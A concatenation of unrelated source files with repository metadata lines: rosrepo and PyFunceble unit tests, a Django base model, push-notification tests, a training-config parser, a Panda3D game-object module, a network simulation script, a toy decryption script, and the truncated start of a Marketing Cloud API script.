helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls", "--autocomplete"),
(0, "Test\n")
)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls")
self.assertEqual(exitcode, 0)
self.assertIn("Test", stdout)
self.assertIn("http://localhost", stdout)
self.assertIn("yes", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-logout", "does_not_exist")
self.assertEqual(exitcode, 1)
self.assertIn("no such Gitlab server", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-logout", "Test")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-gitlab-url", "Test")
self.assertEqual(exitcode, 0)
self.assertEqual(
helper.run_rosrepo("config", "-w", self.wsdir, "--show-gitlab-urls", "--autocomplete"),
(0, "\n")
)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test", "--private-token", "<PASSWORD>")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-gitlab-url", "Test", "http://localhost", "--private-token", "<PASSWORD>", "--store-credentials")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "t0ps3cr3t"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--remove-credentials")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test", "--private-token", "<PASSWORD>")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "Test")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("gitlab_servers"), [{"label": "Test", "url": "http://localhost", "private_token": "<PASSWORD>"}])
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--set-gitlab-url", "Test", "http://localhost")
self.assertEqual(exitcode, 0)
self.assertIn("cannot verify Gitlab private token in offline mode", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--gitlab-login", "Test")
self.assertEqual(exitcode, 0)
self.assertIn("cannot verify Gitlab private token in offline mode", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--remove-credentials")
self.assertEqual(exitcode, 0)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--set-gitlab-url", "Test", "http://localhost")
self.assertEqual(exitcode, 1)
self.assertIn("cannot acquire Gitlab private token in offline mode", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--offline", "--gitlab-login", "Test")
self.assertEqual(exitcode, 1)
self.assertIn("cannot acquire Gitlab private token in offline mode", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--unset-gitlab-url", "Test")
self.assertEqual(exitcode, 0)
cfg = Config(self.wsdir)
cfg["gitlab_servers"] = [{"label": "NoURL"}]
cfg.write()
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "NoURL")
self.assertEqual(exitcode, 1)
self.assertIn("cannot acquire token for Gitlab server without URL", stdout)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--gitlab-login", "does_not_exist")
self.assertEqual(exitcode, 1)
self.assertIn("no such Gitlab server", stdout)
#######################
self.assertEqual(self.get_config_value("ros_root"), self.ros_root_dir)
helper.run_rosrepo("config", "-w", self.wsdir, "--unset-ros-root")
self.assertEqual(self.get_config_value("ros_root"), None)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--set-ros-root", self.ros_root_dir)
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("ros_root"), self.ros_root_dir)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-catkin-lint")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_catkin_lint"), False)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--catkin-lint")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_catkin_lint"), True)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-catkin-lint")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_catkin_lint"), False)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-rosclipse")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_rosclipse"), False)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--rosclipse")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_rosclipse"), True)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-rosclipse")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_rosclipse"), False)
#######################
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-env-cache")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_env_cache"), False)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--env-cache")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_env_cache"), True)
exitcode, stdout = helper.run_rosrepo("config", "-w", self.wsdir, "--no-env-cache")
self.assertEqual(exitcode, 0)
self.assertEqual(self.get_config_value("use_env_cache"), False)
#######################
def test_init_failures(self):
"""Test proper behavior of 'rosrepo init'"""
with patch("rosrepo.cmd_init.find_ros_root", lambda x: None):
exitcode, stdout = helper.run_rosrepo("init", self.wsdir)
self.assertEqual(exitcode, 1)
self.assertIn("cannot detect ROS distribution", stdout)
os.environ["HOME"] = self.wsdir
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, self.wsdir)
self.assertEqual(exitcode, 1)
self.assertIn("$HOME", stdout)
exitcode, stdout = helper.run_rosrepo("init", "-r", self.ros_root_dir, os.path.normpath(os.path.join(os.path.dirname(__file__), os.pardir)))
self.assertEqual(exitcode, 1)
self.assertIn("rosrepo source folder", stdout)
| 1.453125 | 1 |
suministrospr/utils/models.py | amberlowh/suministrospr | 42 | 12797848 | from django.db import models
from .fields import DateTimeCreatedField, DateTimeModifiedField
class BaseModel(models.Model):
created_at = DateTimeCreatedField()
modified_at = DateTimeModifiedField()
class Meta:
get_latest_by = "modified_at"
ordering = ("-modified_at", "-created_at")
abstract = True
| 1.429688 | 1 |
applepushnotification/tests/test_basic.py | xiaohaifxb/applepushnotification | 7 | 12797856 | #!/usr/bin/env python
from applepushnotification import *
from unittest import TestCase
from applepushnotification.tests import TestAPNS
import struct, time
try:
import json
except ImportError, e:
import simplejson as json
class TestBasic(TestAPNS):
def test_construct_service(self):
service = self.create_service()
service.start()
service.stop()
self.assertTrue(service._send_greenlet is None)
self.assertTrue(service._error_greenlet is None)
def test_construct_message(self):
msg = self.create_message()
encoded = str(msg)
command, identifier, expiry, tok_length = struct.unpack("!bIIH",
encoded[0:11])
self.assertEquals(command, 1)
self.assertEquals(identifier, msg.identifier)
self.assertTrue(expiry > time.time())
self.assertEquals(tok_length, 32)
data = encoded[45:]
m = json.loads(data)
self.assertTrue("aps" in m)
def test_send_message(self):
service = self.create_service()
service.start()
service.send(self.create_message())
self.assertTrue(service.stop())
| 1.484375 | 1 |
config.py | Pandinosaurus/pnn.pytorch | 1 | 12797864 | # config.py
import os
import datetime
import argparse
result_path = "results/"
result_path = os.path.join(result_path, datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S/'))
parser = argparse.ArgumentParser(description='Your project title goes here')
# ======================== Data Setings ============================================
parser.add_argument('--dataset-test', type=str, default='CIFAR10', metavar='', help='name of training dataset')
parser.add_argument('--dataset-train', type=str, default='CIFAR10', metavar='', help='name of training dataset')
parser.add_argument('--split_test', type=float, default=None, metavar='', help='percentage of test dataset to split')
parser.add_argument('--split_train', type=float, default=None, metavar='', help='percentage of train dataset to split')
parser.add_argument('--dataroot', type=str, default='../../data', metavar='', help='path to the data')
parser.add_argument('--save', type=str, default=result_path +'Save', metavar='', help='save the trained models here')
parser.add_argument('--logs', type=str, default=result_path +'Logs', metavar='', help='save the training log files here')
parser.add_argument('--resume', type=str, default=None, metavar='', help='full path of models to resume training')
parser.add_argument('--nclasses', type=int, default=10, metavar='', help='number of classes for classification')
parser.add_argument('--input-filename-test', type=str, default=None, metavar='', help='input test filename for filelist and folderlist')
parser.add_argument('--label-filename-test', type=str, default=None, metavar='', help='label test filename for filelist and folderlist')
parser.add_argument('--input-filename-train', type=str, default=None, metavar='', help='input train filename for filelist and folderlist')
parser.add_argument('--label-filename-train', type=str, default=None, metavar='', help='label train filename for filelist and folderlist')
parser.add_argument('--loader-input', type=str, default=None, metavar='', help='input loader')
parser.add_argument('--loader-label', type=str, default=None, metavar='', help='label loader')
# ======================== Network Model Setings ===================================
parser.add_argument('--nblocks', type=int, default=10, metavar='', help='number of blocks in each layer')
parser.add_argument('--nlayers', type=int, default=6, metavar='', help='number of layers')
parser.add_argument('--nchannels', type=int, default=3, metavar='', help='number of input channels')
parser.add_argument('--nfilters', type=int, default=64, metavar='', help='number of filters in each layer')
parser.add_argument('--avgpool', type=int, default=1, metavar='', help='set to 7 for imagenet and 1 for cifar10')
parser.add_argument('--level', type=float, default=0.1, metavar='', help='noise level for uniform noise')
parser.add_argument('--resolution-high', type=int, default=32, metavar='', help='image resolution height')
parser.add_argument('--resolution-wide', type=int, default=32, metavar='', help='image resolution width')
parser.add_argument('--ndim', type=int, default=None, metavar='', help='number of feature dimensions')
parser.add_argument('--nunits', type=int, default=None, metavar='', help='number of units in hidden layers')
parser.add_argument('--dropout', type=float, default=None, metavar='', help='dropout parameter')
parser.add_argument('--net-type', type=str, default='noiseresnet18', metavar='', help='type of network')
parser.add_argument('--length-scale', type=float, default=None, metavar='', help='length scale')
parser.add_argument('--tau', type=float, default=None, metavar='', help='Tau')
# ======================== Training Settings =======================================
parser.add_argument('--cuda', type=bool, default=True, metavar='', help='run on gpu')
parser.add_argument('--ngpu', type=int, default=1, metavar='', help='number of gpus to use')
parser.add_argument('--batch-size', type=int, default=64, metavar='', help='batch size for training')
parser.add_argument('--nepochs', type=int, default=500, metavar='', help='number of epochs to train')
parser.add_argument('--niters', type=int, default=None, metavar='', help='number of iterations at test time')
parser.add_argument('--epoch-number', type=int, default=None, metavar='', help='epoch number')
parser.add_argument('--nthreads', type=int, default=20, metavar='', help='number of threads for data loading')
parser.add_argument('--manual-seed', type=int, default=1, metavar='', help='manual seed for randomness')
parser.add_argument('--port', type=int, default=8097, metavar='', help='port for visualizing training at http://localhost:port')
# ======================== Hyperparameter Setings ==================================
parser.add_argument('--optim-method', type=str, default='Adam', metavar='', help='the optimization routine ')
parser.add_argument('--learning-rate', type=float, default=1e-3, metavar='', help='learning rate')
parser.add_argument('--learning-rate-decay', type=float, default=None, metavar='', help='learning rate decay')
parser.add_argument('--momentum', type=float, default=0.9, metavar='', help='momentum')
parser.add_argument('--weight-decay', type=float, default=1e-4, metavar='', help='weight decay')
parser.add_argument('--adam-beta1', type=float, default=0.9, metavar='', help='Beta 1 parameter for Adam')
parser.add_argument('--adam-beta2', type=float, default=0.999, metavar='', help='Beta 2 parameter for Adam')
args = parser.parse_args() | 1.304688 | 1 |
GameObject.py | P3D-Space-Tech-Demo/Section2SpaceflightDocking | 0 | 12797872 | <gh_stars>0
from panda3d.core import Vec4, Vec3, Vec2, Plane, Point3, BitMask32
from direct.actor.Actor import Actor
from panda3d.core import CollisionSphere, CollisionCapsule, CollisionNode, CollisionRay, CollisionSegment, CollisionHandlerQueue
from direct.gui.OnscreenText import OnscreenText
from direct.gui.OnscreenImage import OnscreenImage
from panda3d.core import TextNode
from panda3d.core import AudioSound
from panda3d.core import PointLight
from panda3d.core import NodePath, PandaNode
from panda3d.core import Quat
from Section2SpaceflightDocking.CommonValues import *
from Section2SpaceflightDocking.Common import Common
import math, random
FRICTION = 10.0
class GameObject():
def __init__(self, pos, modelName, modelAnims, maxHealth, maxSpeed, colliderName, weaponIntoMask, size):
self.root = Common.framework.showBase.render.attachNewNode(PandaNode("obj"))
self.colliderName = colliderName
self.modelName = modelName
if modelName is None:
self.actor = NodePath(PandaNode("actor"))
elif modelAnims is None:
self.actor = Common.framework.showBase.loader.loadModel(modelName)
else:
self.actor = Actor(modelName, modelAnims)
self.actor.reparentTo(self.root)
if pos is not None:
self.root.setPos(pos)
self.maxHealth = maxHealth
self.health = maxHealth
self.healthRechargeRate = 2.0
self.healthRechargeSuppressionTimer = 0
self.healthRechargeSuppressionDuration = 0.5
self.maxSpeed = maxSpeed
self.terminalVelocity = 50
self.flinchCounter = 0
self.velocity = Vec3(0, 0, 0)
self.acceleration = 300.0
self.inControl = True
self.outOfControlTimer = 0
self.walking = False
self.size = size
if colliderName is not None:
colliderNode = CollisionNode(colliderName)
colliderNode.addSolid(CollisionSphere(0, 0, 0, size))
self.colliderNP = self.root.attachNewNode(colliderNode)
self.colliderNP.setPythonTag(TAG_OWNER, self)
colliderNode.setFromCollideMask(0)
colliderNode.setIntoCollideMask(weaponIntoMask)
#self.colliderNP.show()
else:
self.colliderNP = self.root.attachNewNode(PandaNode("stand-in"))
self.deathSound = None
def physicalImpact(self, surfaceNormal):
proj = self.velocity.project(surfaceNormal)
self.velocity -= proj*2
def update(self, dt, fluid = False):
speed = self.velocity.length()
if self.inControl:
if self.walking and speed > self.maxSpeed:
self.velocity.normalize()
self.velocity *= self.maxSpeed
speed = self.maxSpeed
else:
if speed > self.terminalVelocity:
self.velocity.normalize()
self.velocity *= self.terminalVelocity
speed = self.terminalVelocity
if Common.useFriction:
if not self.walking:
perc = speed/self.maxSpeed
frictionVal = FRICTION*dt/(max(1, perc*perc))
if not self.inControl:
frictionVal *= 0.8
if frictionVal > speed:
self.velocity.set(0, 0, 0)
else:
frictionVec = -self.velocity
frictionVec.normalize()
frictionVec *= frictionVal
self.velocity += frictionVec
if not self.inControl:
if speed < 0.1:
self.inControl = True
else:
self.outOfControlTimer -= dt
if self.outOfControlTimer <= 0:
self.inControl = True
if fluid:
self.root.setFluidPos(self.root.getPos() + self.velocity*dt)
else:
self.root.setPos(self.root.getPos() + self.velocity*dt)
if self.healthRechargeSuppressionTimer > 0:
self.healthRechargeSuppressionTimer -= dt
else:
self.alterHealth(self.healthRechargeRate*dt, None, 0, 0)
def alterHealth(self, dHealth, incomingImpulse, knockback, flinchValue, overcharge = False):
previousHealth = self.health
self.health += dHealth
if incomingImpulse is not None and knockback > 0.1:
self.velocity += incomingImpulse*knockback
self.inControl = False
self.outOfControlTimer = knockback*0.1
self.walking = False
if dHealth < 0:
self.healthRechargeSuppressionTimer = self.healthRechargeSuppressionDuration
if self.health < 0:
self.health = 0
if flinchValue > 0:
self.flinchCounter -= flinchValue
if dHealth > 0 and self.health > self.maxHealth and not overcharge:
self.health = self.maxHealth
if previousHealth > 0 and self.health <= 0 and self.deathSound is not None:
self.deathSound.play()
def turnTowards(self, target, turnRate, dt):
if isinstance(target, NodePath):
target = target.getPos(Common.framework.showBase.render)
elif isinstance(target, GameObject):
target = target.root.getPos(Common.framework.showBase.render)
diff = target - self.root.getPos(Common.framework.showBase.render)
selfQuat = self.root.getQuat(Common.framework.showBase.render)
selfForward = selfQuat.getForward()
axis = selfForward.cross(diff.normalized())
axis.normalize()
if axis.lengthSquared() < 0.1:
return
angle = selfForward.signedAngleDeg(diff.normalized(), axis)
quat = Quat()
angle = math.copysign(min(abs(angle), turnRate*dt), angle)
quat.setFromAxisAngle(angle, axis)
newQuat = selfQuat*quat
self.root.setQuat(Common.framework.showBase.render, newQuat)
def getAngleWithVec(self, vec):
forward = self.actor.getQuat(Common.framework.showBase.render).getForward()
forward2D = Vec2(forward.x, forward.y)
vec = Vec2(vec.x, vec.y)
vec.normalize()
angle = forward2D.signedAngleDeg(vec)
return angle
def cleanup(self):
if self.colliderNP is not None and not self.colliderNP.isEmpty():
self.colliderNP.clearPythonTag(TAG_OWNER)
self.colliderNP.removeNode()
self.colliderNP = None
if self.actor is not None:
if isinstance(self.actor, Actor):
self.actor.cleanup()
self.actor.removeNode()
self.actor = None
if self.root is not None:
self.root.removeNode()
self.root = None
class ArmedObject():
def __init__(self):
self.weaponSets = []
self.weaponNPs = {}
self.lockedTarget = None
def weaponFired(self, weapon):
pass
def weaponReset(self, weapon):
pass
def addWeapon(self, weapon, setIndex, sourceNP):
while len(self.weaponSets) <= setIndex:
self.weaponSets.append([])
self.weaponSets[setIndex].append(weapon)
self.weaponNPs[weapon] = sourceNP
def startFiringSet(self, weaponSet):
if weaponSet < len(self.weaponSets):
for weapon in self.weaponSets[weaponSet]:
if not weapon.active:
weapon.triggerPressed(self)
def ceaseFiringSet(self, weaponSet):
if weaponSet < len(self.weaponSets):
for weapon in self.weaponSets[weaponSet]:
if weapon.active:
weapon.triggerReleased(self)
def update(self, dt):
for weaponSet in self.weaponSets:
for weapon in weaponSet:
weapon.update(dt, self)
def attackPerformed(self, weapon):
pass
def cleanup(self):
for weaponSet in self.weaponSets:
for weapon in weaponSet:
weapon.cleanup()
self.weaponSets = []
self.weaponNPs = {}
class Blast():
def __init__(self, model, minSize, maxSize, duration):
self.model = model
self.model.setTwoSided(True)
self.model.setTransparency(True)
self.model.setBillboardPointEye()
self.minSize = minSize
self.maxSize = maxSize
self.sizeRange = self.maxSize - self.minSize
self.duration = duration
self.timer = duration
def update(self, dt):
self.timer -= dt
if self.timer < 0:
self.timer = 0
perc = 1.0 - (self.timer / self.duration)
self.model.setScale(self.minSize + self.sizeRange*perc)
self.model.setAlphaScale(math.sin(perc*3.142))
def cleanup(self):
if self.model is not None:
self.model.removeNode()
self.model = None | 1.703125 | 2 |
2_simulate_sdc.py | sztal/sda-model | 1 | 12797880 | """Run simulations for SDC model.
Parameters
----------
N_JOBS
Number of cores used for parallelization.
RANDOM_SEED
Seed for the random numbers generator.
SPACE
Types of social space.
Available values: 'uniform', 'lognormal', 'clusters_normal'.
N
Sizes of networks,
NDIM
Number of dimensions of simulated social spaces.
DATA_REP
Number of independent realizations of social spaces.
SDA_PARAMS
k
Expected average degree.
alpha
Homophily level.
directed
Directed/undirected networks.
p_rewire
Probability of random rewiring.
SDA_REP
Number of independent realizations of adjacency matrices.
SIM_PARAMS
degseq_type
Degree sequence type.
One of: 'poisson', 'negbinom', 'powerlaw'.
degseq_sort
Should degree sequence be sorted by expected node degrees.
"""
import os
import gc
import numpy as np
import pandas as pd
from sklearn.externals.joblib import Memory
import _
# Globals
ROOT = os.path.dirname(os.path.realpath(__file__))
HERE = ROOT
DATAPATH = os.path.join(HERE, 'raw-data')
# Persistence
MEMORY = Memory(location='.cache', verbose=1)
N_JOBS = 4
# Data generation params
RANDOM_SEED = 101
SPACE = ('uniform', 'lognormal', 'clusters_normal')
N = (1000, 2000, 4000, 8000)
NDIM = (1, 2, 4, 8, 16)
CENTERS = (4,)
DATA_REP = 2
# SDA params
SDA_PARAMS = {
'k': (30,),
'alpha': (2, 4, 8, np.inf),
'directed': (False,),
'p_rewire': (.01,)
}
SDA_REP = 3
SIM_PARAMS = {
'degseq_type': ('poisson', 'negbinom', 'powerlaw'),
'sort': (True, False)
}
@MEMORY.cache(ignore=['n_jobs'])
def simulate_cm(space, dparams, drep, sdaparams, sdarep, simparams, n_jobs):
return _.simulate(space, dparams, drep, sdaparams, sdarep,
simparams, n_jobs, simfunc=_.run_sdac)
# Run simulations
if RANDOM_SEED is not None:
np.random.seed(RANDOM_SEED)
sim = lambda s: simulate_cm(
space=s,
dparams=(N, NDIM, CENTERS),
drep=DATA_REP,
sdaparams=SDA_PARAMS,
sdarep=SDA_REP,
simparams=SIM_PARAMS,
n_jobs=N_JOBS
)
df = None # main data frame
gdf = None # graph data frame
for s in SPACE:
sim(s)
gc.collect()
for s in SPACE:
print(f"\rloading and processing '{s}' space' ...", end="")
_df = sim(s)
_df.drop(columns=['A', 'labels'], inplace=True)
if df is None:
df = _df
else:
df = pd.concat((df, _df), ignore_index=True)
# Save data -------------------------------------------------------------------
# Standard data get saved as feather file, so it can be easily
# shared with R for data analysis and visualization.
# Adjacency matrices data is saved as a separate pickle file.
# It will be used for graph visualizations.
os.makedirs(DATAPATH, exist_ok=True)
# Save main data as a feather file
df.to_feather(os.path.join(DATAPATH, 'sda-data-cm.feather'))
# Save graph data as a pickle file
# joblib.dump(gdf, os.path.join(DATAPATH, 'sda-graphs-cm.pkl'))
| 2.3125 | 2 |
tests/converter/test_url2netloc.py | Centaurioun/PyFunceble | 213 | 12797888 | """
The tool to check the availability or syntax of domain, IP or URL.
::
██████╗ ██╗ ██╗███████╗██╗ ██╗███╗ ██╗ ██████╗███████╗██████╗ ██╗ ███████╗
██╔══██╗╚██╗ ██╔╝██╔════╝██║ ██║████╗ ██║██╔════╝██╔════╝██╔══██╗██║ ██╔════╝
██████╔╝ ╚████╔╝ █████╗ ██║ ██║██╔██╗ ██║██║ █████╗ ██████╔╝██║ █████╗
██╔═══╝ ╚██╔╝ ██╔══╝ ██║ ██║██║╚██╗██║██║ ██╔══╝ ██╔══██╗██║ ██╔══╝
██║ ██║ ██║ ╚██████╔╝██║ ╚████║╚██████╗███████╗██████╔╝███████╗███████╗
╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═════╝╚══════╝╚═════╝ ╚══════╝╚══════╝
Tests of URL 2 Network Location converter.
Author:
<NAME>, @funilrys, contactTATAfunilrysTODTODcom
Special thanks:
https://pyfunceble.github.io/special-thanks.html
Contributors:
https://pyfunceble.github.io/contributors.html
Project link:
https://github.com/funilrys/PyFunceble
Project documentation:
https://pyfunceble.readthedocs.io/en/dev/
Project homepage:
https://pyfunceble.github.io/
License:
::
Copyright 2017, 2018, 2019, 2020, 2021 <NAME>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import unittest.mock
from PyFunceble.converter.url2netloc import Url2Netloc
class TestUrl2Netloc(unittest.TestCase):
"""
Tests our internal URL converter.
"""
def setUp(self) -> None:
"""
Setups everything needed for the tests.
"""
self.converter = Url2Netloc()
def tearDown(self) -> None:
"""
Destroys everything previously created for the tests.
"""
del self.converter
def test_set_data_to_convert_no_string(self) -> None:
"""
Tests the method which let us set the data to work with for the case
that a non-string value is given.
"""
given = ["Hello", "World"]
self.assertRaises(TypeError, lambda: self.converter.set_data_to_convert(given))
def test_set_data_to_convert_empty_string(self) -> None:
"""
Tests the method which let us set the data to work with for the case
that an empty-string value is given.
"""
given = ""
self.assertRaises(ValueError, lambda: self.converter.set_data_to_convert(given))
def test_get_converted_nothing_to_decode(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no conversion is needed.
"""
given = "example.org"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL is given.
"""
given = "https://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_port(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL (with explicit port) is given.
"""
given = "https://example.org:8080/hello/world/this/is/a/test"
expected = "example.org:8080"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_full_url_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that a full URL (with params) is given.
"""
given = "https://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no scheme is given.
"""
given = "example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_scheme_and_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no scheme (but with params) is given.
"""
given = "example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol is given.
"""
given = "://example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_with_params(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol (but params) is given.
"""
given = "://example.org/?is_admin=true"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_without_protocol_and_path(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that no protocol and path is given.
"""
given = "://example.org/"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_2_slashes(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that the given url starts with 2 slashes.
"""
given = "//example.org/hello/world/this/is/a/test"
expected = "example.org"
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
def test_get_converted_url_startswith_1_slash(self) -> None:
"""
Tests the method which let us extracts the netloc from a given URL for
the case that the given url starts with 1 slash.
"""
given = "/example.org/hello/world/this/is/a/test"
expected = ""
self.converter.data_to_convert = given
actual = self.converter.get_converted()
self.assertEqual(expected, actual)
if __name__ == "__main__":
unittest.main()
| 2.125 | 2 |
decrypt_device/main.py | vnszero/Enigma_2.0 | 0 | 12797896 | CEIL = 122
END_LINE = '\n'
FLOOR = 32
FOG_NUM = 1
FOG_POS = 2
ROLLBACK = 90
SECURITY = 'access denied\n'
SHIFT = 0
def verify_code(message : str) -> list:
i = 0
shift = None
fog_num = None
fog_pos = None
code_message = ''
for alpha in message:
if i == SHIFT:
shift = alpha
elif i == FOG_NUM:
fog_num = alpha
elif i == FOG_POS:
fog_pos = alpha
else:
code_message += alpha
if alpha == END_LINE:
with open("code.txt", "w") as file:
file.write(SECURITY)
break
i+=1
return shift, fog_num, fog_pos, code_message
def clear(message : str, fog_num : int, fog_pos : int) -> str:
clear_message = ''
i = FLOOR
for alpha in message:
if i > fog_num:
i = FLOOR
if i == fog_pos:
clear_message += alpha
i += 1
return clear_message
def uncesar(message : str, shift : int) -> str:
uncesar_message = ''
for alpha in message:
ord_ascii = ord(alpha)
if ord_ascii <= shift + FLOOR:
uncesar_message += chr(ord_ascii+ROLLBACK-shift)
else:
uncesar_message += chr(ord(alpha)-shift)
return uncesar_message
def main():
try:
# open, read and verify
encrypt_message = ''
with open("code.txt", "r") as file:
encrypt_message = file.read()
shift, fog_num, fog_pos, code_message = verify_code(encrypt_message)
if shift != None and fog_num != None and fog_pos != None:
# clear
clear_message = clear(code_message, ord(fog_num), ord(fog_pos))
# uncesar
decrypt_message = uncesar(clear_message, ord(shift))
# export
with open('message.txt', 'w') as file:
file.write(decrypt_message)
except:
print('There is a problem with: code.txt, Tip: verify the path')
if __name__ == '__main__':
main() | 2.421875 | 2 |
public/pylib/holdoutgroup.py | shaileshakarte28/SFMC | 0 | 12797904 | <filename>public/pylib/holdoutgroup.py
import requests
import json
import xmltodict
import datetime
from math import ceil
import jxmlease
import operator
import random
from operator import itemgetter
import time
from json import loads, dumps
def auth(clientId: str,
clientSecret: str,
accountId:str
) -> requests.Response:
end_point = "https://mc4pytkknrp1gsz0v23m93b3055y.auth.marketingcloudapis.com/v2/token"
headers = {'Content-type': 'application/json;charset=UTF-8'}
payload = {
"grant_type":"client_credentials",
"client_id": clientId,
"client_secret": clientSecret,
"account_id": accountId,
}
req = requests.post(
end_point,
payload,
{"headers" : headers}
# verify=False
)
# req.close()
return req.json()
cred = auth('<KEY>','<KEY>','6291063')
token = (cred["access_token"])
print("Access Token : ",token)
def dataextension2():
try:
accessToken = token
account_id = "6291063"
de_name = "Test_HoldOut_Group"
de_external_key = "5E4FE032-6C0E-42E8-8B81-99F167D7DFC9"
except Exception as e:
return "There is some problem with the Credentials Provided...",e
try:
descbody =f"""
